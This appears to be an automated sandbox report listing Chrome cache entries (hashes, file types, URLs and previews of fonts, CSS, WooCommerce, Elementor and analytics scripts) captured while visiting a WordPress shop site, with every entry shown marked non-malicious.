                                                                        Preview:jQuery(function(_){return"undefined"!=typeof woocommerce_price_slider_params&&(_(document.body).on("price_slider_create price_slider_slide",function(e,r,i){_(".price_slider_amount span.from").html(accounting.formatMoney(r,{symbol:woocommerce_price_slider_params.currency_format_symbol,decimal:woocommerce_price_slider_params.currency_format_decimal_sep,thousand:woocommerce_price_slider_params.currency_format_thousand_sep,precision:woocommerce_price_slider_params.currency_format_num_decimals,format:woocommerce_price_slider_params.currency_format})),_(".price_slider_amount span.to").html(accounting.formatMoney(i,{symbol:woocommerce_price_slider_params.currency_format_symbol,decimal:woocommerce_price_slider_params.currency_format_decimal_sep,thousand:woocommerce_price_slider_params.currency_format_thousand_sep,precision:woocommerce_price_slider_params.currency_format_num_decimals,format:woocommerce_price_slider_params.currency_format})),_(document.body).trigger("price_slider_updated",[r,i])

                                                                        Chrome Cache Entry: 439

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):1797
                                                                        Entropy (8bit):5.513180777092381
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C1F1E3109AEDF666C1B722B484E0EA9E
                                                                        SHA1:270C502AF868D3AA47DBE1F52302CB4E50BEB8BC
                                                                        SHA-256:D3986C05A625102996B150697981E60528E805BF00679152CBFD800CAEB52CDE
                                                                        SHA-512:83FF171BB2BE2F7A4D5B88779F141DC107AA26B42F363CBB48C8E1FB6A414DBA9AE6ED578A30524EA97B9B39B759D277DA273EA15B38F35DC444C7673DD080CE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://fonts.googleapis.com/css?family=Mulish%3A400%7C-apple-system%2C+BlinkMacSystemFont%2C+%22Segoe+UI%22%2C+Roboto%2C+Oxygen-Sans%2C+Ubuntu%2C+Cantarell%2C+%22Helvetica+Neue%22%2C+sans-serif&subset=latin%2Clatin-ext
                                                                        Preview:/* cyrillic-ext */.@font-face {. font-family: 'Mulish';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/mulish/v13/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aqvG4w-.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Mulish';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/mulish/v13/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aOvG4w-.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Mulish';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/mulish/v13/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aivG4w-.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-fac

                                                                        Chrome Cache Entry: 440

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):1256
                                                                        Entropy (8bit):4.699585940208305
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9F98A7262163D20AEDC73AFBAC70DCEA
                                                                        SHA1:D8B963AB148CDA48ABB4D2D379BD72737C40E089
                                                                        SHA-256:093B42292C864BA77AA5523A73EC87D2690D387FFE7F721BD679860C45902727
                                                                        SHA-512:5386927FBCFAB47F049FEFCA6F278EA50503A79F79AAF1BC563C1C9F25B9ABA0AD10BDDAF598ACA1F831E9FE5EB358489F927DE20C1300F28A72A7F5B87BD49B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=3.3.0
                                                                        Preview:.woof_list_label li .woof_label_term:hover,..woof_list_label li .woof_label_term.checked {. background-color: #34495e;. border-color: #34495e;.}....woof_list_label li {. display: inline-block !important;. margin: 2px;. vertical-align: top;.}...woof_list_label .woof_label_term.{. background-color: #efefef;. border: 1px solid #ddd;. margin: 3px 3px 3px 0;. padding: 3px 4px;. . line-height: 25px;. text-align: center;. overflow: hidden;. text-decoration: none;. cursor: pointer;.. min-width: 50px;. max-width: 100%;. height: 50px;. display: flex;. justify-content: center;. align-items: center;.}...woof_list_label li .woof_label_term:hover,..woof_list_label li .woof_label_term.checked.{. background-color: #477bff;. border-color: #477bff;. color: #fff;.}...woof_label_count{. font-size: 10px;. position: absolute;. border-radius: 200px;. min-width: 17px;. height: 17px;. line-height: 17px !important;. color

                                                                        Chrome Cache Entry: 442

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65280)
                                                                        Category:dropped
                                                                        Size (bytes):139153
                                                                        Entropy (8bit):5.2146927200642335
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:15BB2B8491FC7E84137D65F610E1685A
                                                                        SHA1:CD76B70A5426893E9C022B9A75C50A7C1348E2D0
                                                                        SHA-256:B23F49F504FAA32AAC548B6662FFD64412F6738496FAB8BE38DA46C5B7121804
                                                                        SHA-512:95C05110B29101C84DF71C54172269F478D9CD14965B3DE987613E11E0F1CCF01C1B7D2BF290D97EF11373F24DCCD677F8710E1555D332903181F469D0F2B0BB
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/**. * Swiper 5.3.6. * Most modern mobile touch slider and framework with hardware accelerated transitions. * http://swiperjs.com. *. * Copyright 2014-2020 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: February 29, 2020. */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e=e||self).Swiper=t()}(this,(function(){"use strict";var e="undefined"==typeof document?{body:{},addEventListener:function(){},removeEventListener:function(){},activeElement:{blur:function(){},nodeName:""},querySelector:function(){return null},querySelectorAll:function(){return[]},getElementById:function(){return null},createEvent:function(){return{initEvent:function(){}}},createElement:function(){return{children:[],childNodes:[],style:{},setAttribute:function(){},getElementsByTagName:function(){return[]}}},location:{hash:""}}:document,t="undefined"==typeof window?{document:e,navigator:{userAgent:""},

                                                                        Chrome Cache Entry: 443

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):61
                                                                        Entropy (8bit):4.508263568166706
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:42ADACE676F5AABC801213B68DD2F459
                                                                        SHA1:79676A1B58DDFBDC18EDED38B5FD608B4AA9A81F
                                                                        SHA-256:C277FE3B68AD507BA99939F981BAAC6ADE7850FABDAAFF0ACE5334C5A8268700
                                                                        SHA-512:41754E6D9D8A5EA882C22BDA32C9F717433F2ECA7DCC09C9FC50F4EB096A1221202C7DCBE0927D792AB93BB74BE172F19EC932B8DFE085A6F39F493DE8BF4BDB
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/by_featured/css/by_featured.css?ver=3.3.0
                                                                        Preview:.woof_checkbox_instock_container{. margin-bottom: 4px;.}..

                                                                        Chrome Cache Entry: 446

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (54731)
                                                                        Category:downloaded
                                                                        Size (bytes):54732
                                                                        Entropy (8bit):4.916853642347119
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E694437A73EF9A97F833B891BB7A7D9D
                                                                        SHA1:23F250FBB82C13A399EC704B218BD857A31A76B0
                                                                        SHA-256:F18AEA69A9776B93A0FB73FEC35395A122B5DEEBF698911E8E5FE0BA759F3C1A
                                                                        SHA-512:E4DE364B6F11C2302EC15F0F7A144BE9E844206BABBEF090C26EC0960369134CB8A1525BE170B18F0B16B56184457B94EC55A0D98167442476E69C3AE27858CE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/enjoy-instagram-instagram-responsive-images-gallery-and-carousel/assets/css/animate.min.css?ver=6.2.2
                                                                        Preview:@charset "UTF-8";.animated{-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both}.animated.infinite{-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite}.animated.hinge{-webkit-animation-duration:2s;animation-duration:2s}@-webkit-keyframes bounce{0%,20%,50%,80%,100%{-webkit-transform:translateY(0);transform:translateY(0)}40%{-webkit-transform:translateY(-30px);transform:translateY(-30px)}60%{-webkit-transform:translateY(-15px);transform:translateY(-15px)}}@keyframes bounce{0%,20%,50%,80%,100%{-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}40%{-webkit-transform:translateY(-30px);-ms-transform:translateY(-30px);transform:translateY(-30px)}60%{-webkit-transform:translateY(-15px);-ms-transform:translateY(-15px);transform:translateY(-15px)}}.bounce{-webkit-animation-name:bounce;animation-name:bounce}@-webkit-keyframes flash{0%,50%,100%{opacity:1}25%,75%{opacity:0}}@keyframes

                                                                        Chrome Cache Entry: 447

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):47993
                                                                        Entropy (8bit):5.4930700302465745
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:BE3561ADBA36B2681F9AD92C01385394
                                                                        SHA1:016B3E73A31E92698F303F7F08CEB03FB8262548
                                                                        SHA-256:F4718500601A7B328143C06DD7FE07FE7546253DCD7CEB5A6CF8105EEB52474E
                                                                        SHA-512:570A8FA0EADE36E4CD840AC46B7584128069B332CBFCDBCC2247A0BAA7486C284F1948C5171935A95CF9C7B13EDA53914B6A2F368B513DC2602679D000486FC5
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.7.1
                                                                        Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEz0dL_nz.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzQdL_nz.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzwdL_nz.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzMdL_nz.woff2) format('woff2');. unicod

                                                                        Chrome Cache Entry: 448

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 1536 x 1536, 8-bit colormap, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):1056101
                                                                        Entropy (8bit):7.945185264013855
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A92ECFF8B9E8D0D7643CCD57D7B19375
                                                                        SHA1:52F83E7B6E317D433E977750385064E0CF3A60A1
                                                                        SHA-256:C9361BFBB2DE666924C0360D5570CBDF2D5C39FB4FA341023341BD480D89D761
                                                                        SHA-512:CDCA9B59D177174733384CA3521FC1958FF49FD21FE19A0EC1CB1A112B59044845679C057A8BCBD086176B5B3CCD05C48994444CB91717B0C3B9708A78563BC2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/uploads/2024/09/Asset-6@4x-1536x1536.png
                                                                        Preview:.PNG........IHDR..............0sY....pHYs..........+......PLTE...N?;......}.}....%%....................................................................................7A4...:E75?2..................=G:......3;0...?I=......19.;D:/7,...:B76>5...AL?4<2..........8A8.........................................-5*...DNB..........TVSorr........`b`..............jllz}zGQEWYW...ruv......lom......]_]QRP...gii...vyu...............!..wz{......cfe...svqZ\Y......}.}mpp...........&.....JKH........fie.........*1'...}........|.....txyceay~.FGDKUI.............'-#...NMM...jmgCBA.......-&(....prm4+/,!!...(.....'#$>A<430...U`UQ\P9144''."....Ze[...NXM.....,+E41...#(.E9<MPJ......;;8...^ka...PBF<-,<58dsjN<<3!.O80\IHk{tF/'....noi<(!XA:s..hRL{...........\PV.............s^YfY_fB9...],&...~hc......wp.kg}TKuC<.[X..|..........9A.z....tRNS........1r... .IDATx..X.k.H.....+...... }0../.C.3,.'.O.1....[....:..BXt..b............@{!0..=G....I.ao....x......o..*........Q...ysz.{'.o.yz..T(

                                                                        Chrome Cache Entry: 449

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65450)
                                                                        Category:dropped
                                                                        Size (bytes):227551
                                                                        Entropy (8bit):5.3778011509864
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DFE118A9B39E91A6840112474B1D7869
                                                                        SHA1:DDE9A2FD5CFEA84B536969DF460DF82672F593AB
                                                                        SHA-256:12FD4887EE01F80F55F5EF58DDE1DCE0910330574296263181EB1EC502B2EB3B
                                                                        SHA-512:08A41E4ACEBF044F0F7C1FB656C2B490DF2E2D3A81CDEB2DA7DE86EAD61EEB0CCB8BC0EE2C7B063A1E55E9EC5830BE13A73957825CCE80BCCA8F68785D4D9DC8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*! For license information please see modules.88d849cb19f0e6d87c26.js.LICENSE.txt */.!function(){var e={4788:function(e,t,n){"use strict";n.d(t,{s:function(){return r}});const r=Object.freeze({IDENTIFY_USER:"identify_user",AUTOTAG_RECORDING:"autotag_recording",TAG_RECORDING:"tag_recording",HEATMAP_HELO:"heatmap_helo",RECORDING_HELO:"recording_helo",REPORT_USER_ID:"report_user_id",MUTATION:"mutation",MOUSE_CLICK:"mouse_click",INPUT_CHOICE_CHANGE:"input_choice_change",KEY_PRESS:"key_press",MOUSE_MOVE:"mouse_move",RELATIVE_MOUSE_MOVE:"relative_mouse_move",CLIPBOARD:"clipboard",PAGE_VISIBILITY:"page_visibility",SCROLL_REACH:"scroll_reach",SCROLL:"scroll",SELECT_CHANGE:"select_change",VIEWPORT_RESIZE:"viewport_resize",SCRIPT_PERFORMANCE:"script_performance",REPORT_CONTENT:"report_content",INSERTED_RULE:"inserted_rule",DELETED_RULE:"deleted_rule"})},6939:function(e,t,n){"use strict";n.d(t,{f:function(){return f},W:function(){return g}});const r=Object.freeze({LIVE:"LIVE",REVIEW_WEBAPP:"REVI

                                                                        Chrome Cache Entry: 451

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1668)
                                                                        Category:dropped
                                                                        Size (bytes):1834
                                                                        Entropy (8bit):5.438090839180011
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D0A6D8547C66B0D7B0172466558D1208
                                                                        SHA1:FF93916519C7B9483251F609E4D29F38C30A66E3
                                                                        SHA-256:3B1384FF918D4B7F95F9EE5C8FC388203DEDFF7344D3D96598C9562162788612
                                                                        SHA-512:48BB25B08BFCC9944CD1FC3BD039EA41D1A870F488971839F2891B91710F3FF9EB0B523AA7AB888BF9968BBBCA41A48761405ABBAFC6C6D24927C078049545B8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*!. * JavaScript Cookie v2.1.4. * https://github.com/js-cookie/js-cookie. *. * Copyright 2006, 2015 Klaus Hartl & Fagner Brack. * Released under the MIT license. */.!function(e){var n,o,t=!1;"function"==typeof define&&define.amd&&(define(e),t=!0),"object"==typeof exports&&(module.exports=e(),t=!0),t||(n=window.Cookies,(o=window.Cookies=e()).noConflict=function(){return window.Cookies=n,o})}(function(){function m(){for(var e=0,n={};e<arguments.length;e++){var o,t=arguments[e];for(o in t)n[o]=t[o]}return n}return function e(C){function g(e,n,o){var t,r;if("undefined"!=typeof document){if(1<arguments.length){"number"==typeof(o=m({path:"/"},g.defaults,o)).expires&&((r=new Date).setMilliseconds(r.getMilliseconds()+864e5*o.expires),o.expires=r),o.expires=o.expires?o.expires.toUTCString():"";try{t=JSON.stringify(n),/^[\{\[]/.test(t)&&(n=t)}catch(l){}n=C.write?C.write(n,e):encodeURIComponent(String(n)).replace(/%(23|24|26|2B|3A|3C|3E|3D|2F|3F|40|5B|5D|5E|60|7B|7D|7C)/g,decodeURIComponent),e=(

                                                                        Chrome Cache Entry: 452

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3835)
                                                                        Category:downloaded
                                                                        Size (bytes):306894
                                                                        Entropy (8bit):5.579409456315532
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:EAE759FB443DF1A77E5B5A053AAFE45B
                                                                        SHA1:B6E5B3C7DEDD68D635FD74C9118628B0595AACDC
                                                                        SHA-256:4D70E5C2BBCBEA5F6383F830445BC685A811E1C2990D047EC62F5908AB9AAFD4
                                                                        SHA-512:9B8545BAE9BE6D8C6825DACABF3F7D7C13525F69BEB184D6771D3C52EDA05C8C4C4715193CDC35BAFB33B71A7E825C7BD6E763BA9A2C75444666C7D1B61CB23B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-2LEWGZ9NK3
                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":11,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",

                                                                        Chrome Cache Entry: 453

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (14238)
                                                                        Category:dropped
                                                                        Size (bytes):14277
                                                                        Entropy (8bit):5.115717878518809
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2D4C5681F3A523F916C94C669F34F8A9
                                                                        SHA1:2E9E6B41841915BE50F08B6985FF60F8725906A0
                                                                        SHA-256:F63F130E6C972C9C2A733C0C9BE0BE21F1A532E323600F9C7608CB96BE30C360
                                                                        SHA-512:B99DD774B3B39FF2FE3E499B62DD2CA38EB5369181C2F031468A52801CCE94A680738C3A20F65B4E546434E38DEDA68142EF917A7A158602ABFF46694B68024E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*! elementor - v3.6.1 - 23-03-2022 */.(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[354],{7914:e=>{e.exports=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}},e.exports.default=e.exports,e.exports.__esModule=!0},381:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=(e,t)=>{t=Array.isArray(t)?t:[t];for(const n of t)if(e.constructor.name===n.prototype[Symbol.toStringTag])return!0;return!1}},8135:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.ViewModule{getDefaultSettings(){return{selectors:{elements:".elementor-element",nestedDocumentElements:".elementor .elementor-element"},classes:{editMode:"elementor-edit-mode"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$elements:this.$element.find(e.elements).not(this.$element.find(e.nestedDocumentElements))}}getDocumentSettings(e){let t;if(this.isEdit){t={

                                                                        Chrome Cache Entry: 455

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):11
                                                                        Entropy (8bit):3.2776134368191165
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:825644F747BAAB2C00E420DBBC39E4B3
                                                                        SHA1:10588307553E766AB3C7D328D948DC6754893CEF
                                                                        SHA-256:7C41B898C5DA0CFA4AA049B65EF50248BCE9A72D24BEF4C723786431921B75AA
                                                                        SHA-512:BFE6E8DF36C78CBFD17BA9270C86860EE9B051B82594FB8F34A0ADF6A14E1596D2A9DCDC7EB6857101E1502AFF6FF515A36E8BA6C80DA327BC11831624A5DAEA
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:Bad Request

                                                                        Chrome Cache Entry: 456

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):5292
                                                                        Entropy (8bit):4.949846799231143
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D83CE3C5DC1AEF20FB38F1162082E4A1
                                                                        SHA1:9DDD1D93FC1E72EDB42537EF9565085C67E4F7D1
                                                                        SHA-256:C62BD88E57893D6E5827CD8A882BC7B1800A7A57DDBE5749137A7D216C67F0B9
                                                                        SHA-512:0DE01A79C7331C44D227E035CDC6A5ED3D25FE709BBB75EE94264202C413AD3A6BB7AB12021A197C514A82F054037EDDA3286933477321889C1063BB0B5A3A28
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.css?ver=1.2.9
                                                                        Preview:.c-offcanvas, .c-offcanvas-content-wrap {. transform: translate3d(0, 0, 0);. -webkit-backface-visibility: hidden;. backface-visibility: hidden;.}...c-offcanvas-bg.c-offcanvas-bg--push, .c-offcanvas-bg.c-offcanvas-bg--reveal, .c-offcanvas-content-wrap, .c-offcanvas {. transition: transform 300ms cubic-bezier(0.4, 0, 0.6, 1);.}...c-offcanvas.is-open {. transform: translate3d(0, 0, 0);. visibility: visible;. opacity: 1;.}../**. * Offcanvas-content-wrap.*/..c-offcanvas-content-wrap {. position: relative;. z-index: 3;. overflow: hidden;.}../**. * Offcanvas Panel.*/..c-offcanvas {. position: fixed;. min-height: 100%;. max-height: none;. top: 0;. display: block;. background: #fff;. overflow: hidden;.}..c-offcanvas--opening {. transition-timing-function: cubic-bezier(0.4, 0, 0.6, 1);.}..c-offcanvas.is-closed {. max-height: 100%;. overflow: hidden;. visibility: hidden;. box-shadow: none;. opacity: 0;. z-index: -1;.}...c-offcanvas.is-scrollable {. overflow-y: auto;.}..c-

                                                                        Chrome Cache Entry: 457

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (572)
                                                                        Category:downloaded
                                                                        Size (bytes):226005
                                                                        Entropy (8bit):5.484111073245769
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:185B1E23373603D639FB2116758CC4C7
                                                                        SHA1:E9E95055B654A96946AB2899FC24CA813DE83885
                                                                        SHA-256:323B2A37D46054AA64A27AB91DB0B6D6C25BFBA00DA526291BF3B7FF2B6FA016
                                                                        SHA-512:8CD6344626C91B1D818B2E4672AA9665876DB5B3D7D60EE81F70840B598F701E1E6EDAAC9299F9DDEB9204F12BF3DF7B5CE5C21F96739F10B5065EC553AFFC88
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://mc.yandex.ru/metrika/tag.js
                                                                        Preview:.(function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function t(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length)return{next:La(ba)};throw Error(String(ba)+" is not an iterable or ArrayLike");}function Oa(ba){for(var ta,$a=[];!(ta=ba.next()).done;)$a.push(ta.value);return $a}function Va(ba){return ba instanceof Array?ba:Oa(t(ba))}.var Lf="function"==typeof Object.create?Object.create:function(ba){function ta(){}ta.prototype=ba;return new ta},Mf;if("function"==typeof Object.setPrototypeOf)Mf=Object.setPrototypeOf;else{var Jh;a:{var Kh={a:!0},Lh={};try{Lh.__proto__=Kh;Jh=Lh.a;break a}catch(ba){}Jh=!1}Mf=Jh?function(ba,ta){ba.__proto__=ta;if(ba.__proto__!==ta)throw new TypeError(ba+" is not extensible");return ba}:null}var Cm=Mf;.function Dm(ba,ta){ba.prototype=Lf(ta.prototype);ba.prototype.constructor=ba;if(Cm)Cm(ba,ta);else for(var $a in ta)if("p

                                                                        Chrome Cache Entry: 458

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (17809), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):17809
                                                                        Entropy (8bit):4.729799310947723
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1DDF23FCFD1B2941C456CE01DA8180A6
                                                                        SHA1:156EF5CC77061010E3F4123A47FA415C6391E5FF
                                                                        SHA-256:DD18A408A35AA5D393458657EB24FB56AB754ECE3F88BD78A038E5793D3F6991
                                                                        SHA-512:0FF8336A2AC3C3CE74D60E41291C7E14E365479DBB30D16CF3765847C0AD208175DD73D3301BF455867612963C0D8C67B32CBE1255C7999A23B16ECCD6B8CDA7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=6.6.1
                                                                        Preview::root{--woocommerce:#a46497;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#a46497;--wc-primary-text:white;--wc-secondary:#ebe9eb;--wc-secondary-text:#515151;--wc-highlight:#77a464;--wc-highligh-text:white;--wc-content-bg:#fff;--wc-subtext:#767676}.woocommerce .woocommerce-error .button,.woocommerce .woocommerce-info .button,.woocommerce .woocommerce-message .button,.woocommerce-page .woocommerce-error .button,.woocommerce-page .woocommerce-info .button,.woocommerce-page .woocommerce-message .button{float:right}.woocommerce .col2-set,.woocommerce-page .col2-set{width:100%}.woocommerce .col2-set::after,.woocommerce .col2-set::before,.woocommerce-page .col2-set::after,.woocommerce-page .col2-set::before{content:" ";display:table}.woocommerce .col2-set::after,.woocommerce-page .col2-set::after{clear:both}.woocommerce .col2-set .col-1,.woocommerce-page .col2-set .col-1{float:left;width:48%}.woocommerce .col2-set .col-2,.woocommerce-page .col2-set .col-2

                                                                        Chrome Cache Entry: 459

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 408 x 464, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):18160
                                                                        Entropy (8bit):7.9507935414647015
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CC6D2A2EBBDB4CA2D35C2A94F666E56C
                                                                        SHA1:7B9695FBE92878E751DB650F89A9E9A74279EE10
                                                                        SHA-256:DEDCB23076BE667A897F4A90BDE0BC80C6A6A58CFE68433BDE59546EB9B74EB5
                                                                        SHA-512:C9E27F2AAF2AEF1CA88C45EBA39DB2D1C16BAF6886EDDB39FB6723A97320E31697FB53AA8B885B1E445D2F361F91BE0A75B14399D990953D543735A400320E16
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
